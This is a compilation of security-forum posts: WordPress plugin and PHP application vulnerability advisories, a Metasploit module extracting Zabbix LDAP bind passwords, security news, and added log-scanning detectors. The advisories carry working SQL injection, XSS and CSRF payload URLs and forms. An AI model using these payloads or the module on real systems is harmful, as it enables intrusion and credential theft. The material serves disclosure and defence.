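A log-side detection for the upload-then-execute sequence the module above performs, as an added example that is not part of the Metasploit code: flag any POST to the theme's admin/upload-file.php, and pair it with a later GET of a .php file under the theme's uploads/ directory from the same client. It assumes combined-format access logs and the default theme path /wp-content/themes/holding_pattern/ (the module derives it from wordpress_url_themes); the log lines are constructed.

```python
"""Added example, not part of the Metasploit module above: scan web server
access logs for the sequence the module performs, a POST to the theme's
admin/upload-file.php followed by a GET of a .php file under the theme's
uploads/ directory from the same client. Assumptions: combined log format,
and the theme installed under /wp-content/themes/holding_pattern/ (the
module derives the path from wordpress_url_themes, the standard themes
directory). The log lines are constructed for the example."""
import re
from typing import Dict, List, Optional, Tuple

_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
THEME = "/wp-content/themes/holding_pattern/"
UPLOADER = THEME + "admin/upload-file.php"
_UPLOADED_PHP = re.compile(re.escape(THEME) + r"uploads/[^/?]+\.php(?:\?.*)?$",
                           re.IGNORECASE)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Extract client IP, timestamp, method, path and status from one line."""
    m = _LOG_RE.match(line)
    return m.groupdict() if m else None


def _is_uploader(path: str) -> bool:
    return path.split("?", 1)[0].lower() == UPLOADER


def uploader_posts(lines: List[str]) -> List[Tuple[str, str]]:
    """Every (ip, timestamp) that POSTed to the uploader script. Any hit
    deserves a look: the script performs no session check, so anonymous
    POSTs to it are not expected in normal use."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and _is_uploader(rec["path"]):
            hits.append((rec["ip"], rec["ts"]))
    return hits


def upload_then_execute(lines: List[str]) -> List[Tuple[str, str, str]]:
    """(ip, upload_timestamp, executed_path) for every client that POSTed to
    the uploader and later requested a PHP file from uploads/. Lines are
    processed in file order, so only GETs after the POST count."""
    last_upload: Dict[str, str] = {}
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"]
        if rec["method"] == "POST" and _is_uploader(path):
            last_upload[rec["ip"]] = rec["ts"]
        elif rec["method"] == "GET" and _UPLOADED_PHP.match(path) and rec["ip"] in last_upload:
            hits.append((rec["ip"], last_upload[rec["ip"]], path))
    return hits


# Constructed combined-format log lines (IPs from documentation ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [11/Feb/2015:10:01:02 +0000] "POST /wp-content/themes/holding_pattern/admin/upload-file.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Feb/2015:10:01:03 +0000] "GET /wp-content/themes/holding_pattern/uploads/kqzvmtrpxw.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.4 - - [11/Feb/2015:10:02:00 +0000] "GET /wp-content/themes/holding_pattern/uploads/banner.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.4 - - [11/Feb/2015:10:02:05 +0000] "GET /?p=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
not a log line
""".splitlines()

if __name__ == "__main__":
    print(uploader_posts(SAMPLE_LOG))
    print(upload_then_execute(SAMPLE_LOG))
```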
18.
=====================================================
Stored XSS Vulnerability in ADPlugg Wordpress Plugin
=====================================================

.. contents:: Table Of Content

Overview
========

* Title: Stored XSS Vulnerability in ADPlugg Wordpress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/adplugg/
* Severity: Medium
* Version Affected: 1.1.33 and mostly prior to it
* Version Tested: 1.1.33
* Version Patched: 1.1.34

Description
===========

Vulnerable Parameter
--------------------

* Access Code

About Vulnerability
-------------------

This plugin is vulnerable to a stored cross site scripting vulnerability. The issue is exploited by administrator users with access to the AdPlugg settings in WordPress: the Access Code parameter is vulnerable to stored XSS. A malicious administrator can hijack other users' sessions, take control of another administrator's browser or install malware on their computer.

Vulnerability Class
===================

Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

Steps to Reproduce: (POC)
=========================

After installing the plugin:

* Go to Settings --> AdPlugg
* Put this payload in Access Code: "><script>alert(document.cookie)</script>
* Click on Save Changes; you will see the XSS in action
* Reload the page or re-navigate to the page to make sure it is stored

Mitigation
==========

Update to Version 1.1.34

Change Log
==========

https://wordpress.org/plugins/adplugg/changelog/

Disclosure
==========

18-February-2015 Reported to developer
19-February-2015 Developer acknowledged the bug
19-February-2015 Developer patched the bug and pushed the update
21-February-2015 Public Disclosure

Credits
=======

* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

Source
19. Windows Object Explorer 64-bit (WinObjEx64)

WinObjEx64 is an advanced utility that lets you explore the Windows Object Manager namespace. For certain object types, you can double-click on it or use the "Properties..." toolbar button to get more information, such as description, attributes, resource usage etc. WinObjEx64 lets you view and edit object-related security information if you have the required access rights.

System Requirements

WinObjEx64 does not require administrative privileges. However, administrative privileges are required to view much of the namespace and to edit object-related security information.

WinObjEx64 works only on the following x64 Windows: Windows 7, Windows 8, Windows 8.1 and Windows 10, including Server variants. WinObjEx64 does not work on Windows XP; Windows Vista is partially supported. We have no plans for their full support.

In order to use all program features Windows must be booted in DEBUG mode.

Build

WinObjEx64 comes with full source code. In order to build from source you need Microsoft Visual Studio 2013 U4 or a later version.

Authors

© 2015 WinObjEx64 Project
Original WinObjEx © 2003 - 2005 Four-F

Acknowledgements

We would like to thank the following people for their contributions (in alphabetical order):

Andrew Ivlev aka Four-F - author of the original x86-32 WinObjEx
Giuseppe Bonfa aka Evilcry - KDSubmarine author
Mark Russinovich - author of the original proof-of-concept tool WinObj
Microsoft WinDBG developers team

Source and compiled binary here: https://github.com/hfiref0x/WinObjEx64

Project files SHA1: https://github.com/hfiref0x/WinObjEx64/blob/master/Source/SHA1.hash

Compiled version attached. SHA1:
818bf9f0d4189347e9bd157a2810615109423e62 *WinObjEx64.chm
957157318a64482f446b97c82afe786444b1b2ff *WinObjEx64.exe

Copyrights

WinObjEx64 developed by WinObjEx64 Project group, in alphabetical order:
EP_X0FF
MP_ART

This program uses Windows Debugger Local Kernel Debugging Driver © Microsoft Corporation.

Please use this thread for bug reports. Also note that Windows 10 is supported *AS IS* since it wasn't released yet; official support will be added after official release.

Download Source
  20. At last week’s Security Analyst Summit, HackerOne’s Katie Moussouris explains one of the key things that companies that want to start a bounty or vulnerability incentive program should know: There is no one size fits all. Source
  21. Security experts are still trying to assess the effects of the reported attack on a SIM card manufacturer that resulted in the theft of millions of encryption keys for mobile phones around the world, but it's safe to say that the operation has caused reverberations throughout the industry and governments in several countries.

The attack, reported by The Intercept, is breathtaking in its scope and audacity. Attackers allegedly associated with the NSA and GCHQ, the British spy agency, were able to compromise a number of machines on the network of Gemalto, a global manufacturer of mobile SIM cards. The attackers have access to servers that hold the encryption keys for untold millions of mobile phones, allowing them to monitor the voice and data communication of those devices. The document on which the report is based was provided by Edward Snowden, and it says in part, "Gemalto–successfully implanted several machines and believe we have their entire network…" If true, that would mean that the attackers had access to far more than just those SIM encryption keys.

Gemalto officials said in a statement that they were previously unaware of this operation. "The publication indicates the target was not Gemalto per se – it was an attempt to try and cast the widest net possible to reach as many mobile phones as possible, with the aim to monitor mobile communications without mobile network operators and users consent. We cannot at this early stage verify the findings of the publication and had no prior knowledge that these agencies were conducting this operation," the statement says.

Security researchers have said since the beginning of the NSA scandal–and before that, in some cases–that the agency and its allies have an intense interest in monitoring mobile communications. Mobile networks present different challenges than traditional computer networks do for attackers, but they are not insurmountable ones for organizations with the resources of the NSA and GCHQ.

Gemalto, as one of the larger SIM manufacturers on earth, would be a natural target for signals intelligence agencies, as it provides products to hundreds of wireless providers, including Verizon, AT&T and Sprint. Bruce Schneier, CTO of CO3 Systems and a noted cryptographer, said that this operation may represent the most serious revelation of the Snowden documents. "People are still trying to figure out exactly what this means, but it seems to mean that the intelligence agencies have access to both voice and data from all phones using those cards," Schneier said on his blog. "I think this is one of the most important Snowden stories we've read."

The Gemalto revelation could have long-term effects for the technology industry and its relations with the government in the United States and UK. The relationships already have been strained by past revelations of NSA operations against infrastructure owned by companies such as Google, Yahoo and many others. This latest revelation likely won't help matters.

But White House officials aren't worried. "We certainly are aware of how important it is for the United States government to work with private industry; that there are a lot of situations in which our interests are pretty cleanly aligned. And there are certainly steps that the U.S. government has taken in the name of national security that some members of private industry haven't agreed with. But I do think that there is common ground when it comes to — and this is a principle that I've cited before — it's hard for me to imagine that there are a lot of technology executives that are out there that are in a position of saying that they hope that people who wish harm to this country will be able to use their technology to do so," Josh Earnest, White House press secretary, said during a briefing on Friday.

Source
  22. Metasploit auxiliary module for CVE-2013-5572 (Zabbix 2.0.5 LDAP bind password disclosure):

##
# This module requires Metasploit
# Date: 25-09-2013
# Author: Pablo González
# Vendor Homepage: Zabbix -> http://www.zabbix.com
# Software Link: http://www.zabbix.com
# Version: 2.0.5
# Tested On: Linux (Ubuntu, Suse, CentOS)
# CVE: CVE-2013-5572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5572
# More Info: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5572
#            http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html
#            http://seclists.org/fulldisclosure/2013/Sep/151
#            http://www.cvedetails.com/cve/CVE-2013-5572/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'ldap_bind_password Zabbix CVE-2013-5572',
      'Description' => %q{
        Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bind
        password by leveraging management-console access and reading the
        ldap_bind_password value in the HTML source code.
      },
      'License'     => MSF_LICENSE,
      'Author'      => [ '@pablogonzalezpe, Pablo Gonzalez' ]
    ))

    register_options([
      # Session cookie of an already authenticated Zabbix user (the bug needs auth)
      OptString.new('zbx_session', [true, 'Cookie zbx_sessionid']),
      OptString.new('TARGETURI', [true, 'Path Zabbix Authentication', '/zabbix/authentication.php']),
      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
    ], self.class)
  end

  def run
    req
  end

  # Fetch the authentication settings page and pull the LDAP values out of the
  # pre-filled form fields in its HTML source.
  def req
    resp = send_request_cgi({
      'host'         => datastore['RHOST'],
      'method'       => 'POST',
      'uri'          => normalize_uri(target_uri.path.to_s),
      'cookie'       => "zbx_sessionid=#{datastore['zbx_session']}",
      'content-type' => 'application/x-www-form-urlencoded'
    }, datastore['TIMEOUT'])

    # send_request_cgi returns nil on timeout / connection failure
    if resp.nil?
      print_error('No response from the Zabbix server')
      return
    end

    ldap_host(resp)
    user_passDomain(resp)
    user_zabbix(resp)
  end

  # Value of the ldap_host form field
  def ldap_host(response)
    cut = response.body.split("ldap_host\" value=\"")[1]
    if cut != nil
      host = cut.split("\"")[0]
      print_good "LDAP Host => #{host}"
    end
  end

  # Values of the ldap_bind_dn and ldap_bind_password form fields
  def user_passDomain(response)
    cut = response.body.split("ldap_bind_dn\" value=\"")[1]
    if cut != nil
      user = cut.split("\"")[0]
      print_good "User Domain? => #{user}"
    end

    cut = response.body.split("name=\"ldap_bind_password\" value=\"")[1]
    if cut != nil
      pass = cut.split("\"")[0]
      print_good "Password Domain? => #{pass}"
    end
  end

  # Value of the Zabbix user form field
  def user_zabbix(response)
    cut = response.body.split("user\" value=\"")[1]
    if cut != nil
      user = cut.split("\"")[0]
      print_good "User Zabbix => #{user}"
    end
  end
end

Source
  23. Advisory: Multiple reflected XSS, SQLi and information disclosure vulnerabilities in Zeuscart v.4
Advisory ID: SROEADV-2015-12
Author: Steffen Rösemann
Affected Software: Zeuscart v.4
Vendor URL: http://zeuscart.com/
Vendor Status: pending
CVE-ID: will be requested after release on Full Disclosure via the OSS list
Software used for research: Mac OS X 10.10, Firefox 35.0.1

==========================
Vulnerability Description:
==========================

The e-commerce shopping cart Zeuscart v. 4 suffers from multiple XSS, SQLi and information disclosure vulnerabilities.

==================
Technical Details:
==================

====
XSS
====

Reflected XSS vulnerabilities can be found in a common Zeuscart installation in the following locations and could be exploited, for example, by crafting a link and making a registered user click on it.

The parameter "search", which is used in index.php, is vulnerable to XSS attacks.

Exploit example:

http://{TARGET}/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!--

By appending arbitrary HTML and/or JavaScript code to the parameter "schltr", which is also used in index.php, an attacker could exploit this XSS-vulnerable parameter:

Exploit example:

http://{TARGET}/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E

The third XSS vulnerability can be found in the "brand" parameter, which is again used in index.php.

Exploit example:

http://{TARGET}/index.php?do=viewbrands&brand=Bata%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E

====
SQLi
====

The SQL injection vulnerabilities can be found in the administrative backend of Zeuscart v. 4 and reside in the following locations in a common installation.

By appending arbitrary SQL statements to the "id" parameter, an attacker could exploit this SQL injection vulnerability:

Exploit example:

http://{TARGET}/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+

Another SQL injection vulnerability can be found here and can be exploited by appending SQL statements to the vulnerable "cid" parameter:

Exploit example:

http://{TARGET}/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+

The last SQL injection vulnerability I found is in the following location and can be exploited by appending SQL statements to the vulnerable "id" parameter:

http://{TARGET}/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+

======================
Information Disclosure
======================

The administrative backend of Zeuscart v. 4 allows the admin to use a function which displays the PHP installation settings via phpinfo():

http://{TARGET}/admin/?do=getphpinfo

Unfortunately, the PHP script does not check if an authorized admin executes this function: it is possible even for unregistered users to request the above link and see the information phpinfo() displays. That could expose sensitive information to an attacker, which could lead to further exploitation.

=========
Solution:
=========

The vendor has been notified. After releasing a patch which does not seem to correct the issues, the vendor stopped responding to attempts to work out a solution together. Currently, there is no patch available to secure Zeuscart installations.

====================
Disclosure Timeline:
====================

21-Jan-2015 – found the vulnerabilities
21-Jan-2015 – informed the developers (see [3])
21-Jan-2015 – release date of this security advisory [without technical details]
21-Jan-2015 – fork of the repository to keep the vulnerable version available for other researchers (see [5])
22-Jan-2015 – vendor responded, provided detailed information
04-Feb-2015 – vendor patches Bin/Core/Assembler.php; vulnerabilities are still exploitable, which has been reported to the vendor (see [3])
19-Feb-2015 – asked the vendor again if he will patch these issues (see [3]); vendor did not respond
21-Feb-2015 – release date of this security advisory
21-Feb-2015 – sent to Full Disclosure

========
Credits:
========

Vulnerabilities found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://zeuscart.com/
[2] https://github.com/ZeusCart/zeuscart
[3] https://github.com/ZeusCart/zeuscart/issues/28
[4] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-12.html
[5] https://github.com/sroesemann/zeuscart

Source
  24. ====================================================
Product: Easy Social Icons WordPress plugin
Vendor: CyberNetikz
Tested Version: 1.2.2
Vulnerability Type: XSS [CWE-79] and CSRF [CWE-352]
Risk Level: Medium
Solution Status: Solved in version 1.2.3
Discovered and Provided: Eric Flokstra - ITsec Security Services
====================================================

[-] About the Vendor:

Easy Social Icons is a WordPress plugin that can be used to set icons on the public page in order to link to social media platforms such as LinkedIn, Twitter or Facebook.

[-] Advisory Details:

It was discovered that insufficient validation is performed on the 'image_file' parameter, enabling arbitrary JavaScript to be injected. On top of that, no random tokens are used to prevent CSRF attacks. By combining these vulnerabilities an attacker could, for example, trick an admin into setting a persistent XSS payload on the public WordPress page.

[-] Proof of Concept:

<html>
<body>
<form action="http://10.0.2.215/wordpress/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1" method="POST" enctype="multipart/form-data">
<input type="hidden" name="title" value="Example" />
<input type="hidden" name="image_file" value="http://10.0.2.215/wordpress/wp-content/uploads/2015/02/cookie.jpg"><script>alert(1)</script>" />
<input type="hidden" name="url" value="http://www.example.org" />
<input type="hidden" name="sortorder" value="0" />
<input type="hidden" name="target" value="1" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="submit_button" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

[-] Disclosure Timeline:

[02 Feb 2015]: Vendor notification
[02 Feb 2015]: Vulnerability confirmation
[11 Feb 2015]: Vulnerability patched
[19 Feb 2015]: Public disclosure

[-] Solution:

Update to the latest version of Easy Social Icons.

[-] References:

[1] Easy Social Icons Changelog -- https://wordpress.org/plugins/easy-social-icons/changelog/
[2] Common Weakness Enumeration (CWE) -- http://cwe.mitre.org
[3] ITsec Security Services BV -- http://www.itsec.nl

------------------------------------------------------------------------
ITsec Security Services bv. (KvK. 34181927)
Postal Address: P.O. Box 5120, 2000GC Haarlem
Visitors Address: Kenaupark 23, 2011 MR Haarlem
Phone: +31 - (0)23 542 05 78

The information contained in this email communication is confidential and is intended solely for the use of the individual or entity to whom it is addressed and others authorized to receive it. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or taking any action in reliance of the contents of this information is strictly prohibited and may be unlawful. No rights may be attached to this message. ITsec does not accept any liability for incorrect and incomplete transmission or delayed receipt of this e-mail nor for the effects or damages caused by the direct or indirect use of the information or functionality provided by this posting, nor the content contained within. Use them at your own risk.

Source
  25. Advisory: Multiple SQLi, stored/reflected XSS and CSRF vulnerabilities in phpBugTracker v.1.6.0
Advisory ID: SROEADV-2015-16
Author: Steffen Rösemann
Affected Software: phpBugTracker v.1.6.0
Vendor URL: https://github.com/a-v-k/phpBugTracker
Vendor Status: patched
CVE-ID: will be requested after release on Full Disclosure via the OSS list
Tested on: OS X 10.10 with Firefox 35.0.1; Kali Linux 3.18, Iceweasel 31

==========================
Vulnerability Description:
==========================

The issue tracker phpBugTracker v. 1.6.0 suffers from multiple SQLi, stored/reflected XSS and CSRF vulnerabilities.

==================
Technical Details:
==================

The following files used in a common phpBugTracker installation suffer from different SQLi, stored/reflected XSS and CSRF vulnerabilities:

===========
project.php
===========

SQL injection / underlying CSRF vulnerability in project.php via id parameter:

http://{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+

Stored XSS via input field "project name":

http://{TARGET}/admin/project.php?op=add

executed in: e.g. http://{TARGET}/admin/project.php, http://{TARGET}/index.php

========
user.php
========

Reflected XSS in user.php via use_js parameter:

http://{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1

executed in: same page

=========
group.php
=========

Reflected XSS in group.php via use_js parameter:

http://{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1

executed in: same page

(Blind) SQL injection / underlying CSRF vulnerability in group.php via group_id parameter (used in different operations):

http://{TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+
http://{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+

==========
status.php
==========

SQL injection / underlying CSRF vulnerability in status.php via status_id parameter:

http://{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

Stored XSS via input field "Description":

http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0

executed in: e.g. http://{TARGET}/admin/status.php

CSRF vulnerability in status.php (delete statuses):

<img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}">

==============
resolution.php
==============

SQL injection / underlying CSRF vulnerability in resolution.php via resolution_id parameter:

http://{TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+

CSRF vulnerability in resolution.php (delete resolutions):

<img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}">

============
severity.php
============

SQL injection / underlying CSRF vulnerability in severity.php via severity_id parameter:

http://{TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

CSRF vulnerability in severity.php (delete severities):

<img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}">

Stored XSS in severity.php via input field "Description":

http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0

executed in: e.g. http://{TARGET}/admin/severity.php

============
priority.php
============

SQL injection / underlying CSRF vulnerability in priority.php via priority_id parameter:

http://{TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+

======
os.php
======

SQL injection / underlying CSRF vulnerability in os.php via os_id parameter:

http://{TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+

CSRF vulnerability in os.php (delete operating systems):

<img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}">

Stored XSS vulnerability in os.php via input field "Regex":

http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0

executed in: e.g. http://{TARGET}/admin/os.php?

============
database.php
============

SQL injection / underlying CSRF vulnerability in database.php via database_id:

http://{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+

CSRF vulnerability in database.php (delete databases):

<img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}">

Stored XSS vulnerability in database.php via input field "Name":

http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0

========
site.php
========

CSRF vulnerability in site.php (delete sites):

<img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}">

SQL injection / underlying CSRF vulnerability in site.php via site_id parameter:

http://{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+

=======
bug.php
=======

This issue has already been assigned CVE-2004-1519, but does not seem to have been corrected since the assignment:

SQL injection / underlying CSRF vulnerability in bug.php via project parameter:

http://{TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+

For details see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519.

=========
Solution:
=========

Update to version 1.7.0.

====================
Disclosure Timeline:
====================

03/05-Feb-2015 – found the vulnerabilities
05-Feb-2015 – informed the developers (see [3])
05-Feb-2015 – release date of this security advisory [without technical details]
05-Feb-2015 – forked the GitHub repository to keep it available for other security researchers (see [4])
05/06-Feb-2015 – vendor replied, will provide a patch for the vulnerabilities
09-Feb-2015 – vendor provided a patch (version 1.7.0, see [3]); technical details will be released on 19th February 2015
19-Feb-2015 – release date of this security advisory
19-Feb-2015 – sent to Full Disclosure

========
Credits:
========

Vulnerabilities found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] https://github.com/a-v-k/phpBugTracker
[2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html
[3] https://github.com/a-v-k/phpBugTracker/issues/4
[4] https://github.com/sroesemann/phpBugTracker

Source
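The Zeuscart (post 23) and phpBugTracker (post 25) advisories above describe the same four request shapes: UNION/SLEEP-style SQL injection through id-type parameters, reflected XSS through search/use_js-type parameters, state-changing GET deletes (op=del) that carry no CSRF token, and an admin/?do=getphpinfo endpoint that answers without an admin session. The following log scanner is an added example for defenders, not code from either advisory, the vendors or the forum post: it parses combined-format access-log lines and flags those patterns. The hostname bugtracker.example, the rule names, and every log line are constructed for this example.

```python
"""Scan web-server access-log lines for the request patterns described in the
Zeuscart and phpBugTracker advisories: SQL injection through id-style
parameters, reflected XSS through search/use_js-style parameters, GET-based
deletes with no CSRF token, and unauthenticated access to admin/?do=getphpinfo.
The log lines below are constructed for this example."""
import re
from urllib.parse import parse_qsl, urlsplit

# Assumed hostname of the protected application (not taken from the advisories).
SITE_HOST = "bugtracker.example"

# Combined log format: ip ident user [ts] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

# Content rules run against every percent-decoded query-string value.
VALUE_RULES = {
    "sqli_union": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S),
    "sqli_blind": re.compile(r"\b(sleep|benchmark)\s*\(|\bsubstring\s*\(\s*version\s*\(", re.I),
    "xss_tag": re.compile(r"<\s*(script|body|img|svg|iframe)\b|\bon[a-z]+\s*=", re.I),
}


def parse_line(line):
    """Return a dict with the fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    url = urlsplit(entry["target"])
    entry["path"] = url.path
    # parse_qsl percent-decodes values and turns '+' into spaces, so the rules
    # below see the same text the vulnerable PHP script would have received.
    entry["params"] = parse_qsl(url.query, keep_blank_values=True)
    return entry


def classify(entry, site_host=SITE_HOST):
    """Return the sorted list of rule names that fire for one parsed entry."""
    alerts = set()
    for _, value in entry["params"]:
        for name, rx in VALUE_RULES.items():
            if rx.search(value):
                alerts.add(name)
    pmap = dict(entry["params"])
    # Zeuscart: admin/?do=getphpinfo answers without checking for an admin
    # session, so every hit on it deserves review.
    if entry["path"].rstrip("/") == "/admin" and pmap.get("do") == "getphpinfo":
        alerts.add("phpinfo_exposed")
    # phpBugTracker: deletes are plain GETs (op=del) without a CSRF token. A
    # delete whose Referer is missing or belongs to another origin matches the
    # <img src=...> vector from the advisory. This is a heuristic (some users
    # strip the Referer), so treat it as a review queue, not a verdict.
    if (entry["method"] == "GET" and entry["path"].startswith("/admin/")
            and pmap.get("op") == "del"):
        ref_host = urlsplit(entry["referer"]).hostname
        if ref_host is None or ref_host.lower() != site_host.lower():
            alerts.add("csrf_delete")
    return sorted(alerts)


def scan(lines, site_host=SITE_HOST):
    """Map 1-based line numbers to their alerts; lines with no alert are omitted."""
    hits = {}
    for n, line in enumerate(lines, 1):
        entry = parse_line(line)
        if entry is not None:
            alerts = classify(entry, site_host)
            if alerts:
                hits[n] = alerts
    return hits


# Constructed sample log: lines 1-5 and 8 mirror the advisory patterns,
# lines 6 and 7 are benign (a normal search and a same-origin delete).
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Feb/2015:10:00:01 +0100] "GET /admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [21/Feb/2015:10:00:02 +0100] "GET /admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+ HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [21/Feb/2015:10:00:03 +0100] "GET /admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1 HTTP/1.1" 200 3301 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [21/Feb/2015:10:00:04 +0100] "GET /admin/status.php?op=del&status_id=3 HTTP/1.1" 302 0 "http://attacker.example/page.html" "Mozilla/5.0"',
    '10.0.0.11 - - [21/Feb/2015:10:00:05 +0100] "GET /admin/?do=getphpinfo HTTP/1.1" 200 44120 "-" "Mozilla/5.0"',
    '10.0.0.3 - - [21/Feb/2015:10:00:06 +0100] "GET /index.php?do=search&search=shoes HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '10.0.0.2 - - [21/Feb/2015:10:00:07 +0100] "GET /admin/status.php?op=del&status_id=3 HTTP/1.1" 302 0 "http://bugtracker.example/admin/status.php" "Mozilla/5.0"',
    '10.0.0.8 - - [21/Feb/2015:10:00:08 +0100] "GET /index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!-- HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, alerts in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(alerts)}")
```

The value rules are deliberately run on decoded parameter values rather than on the raw request line, because the advisories' payloads arrive percent-encoded and a raw-line match on "union select" would miss them. The csrf_delete rule is the only one that depends on context (Referer versus the site's own host), which is why site_host is a parameter; point it at the real vhost name before running this over production logs.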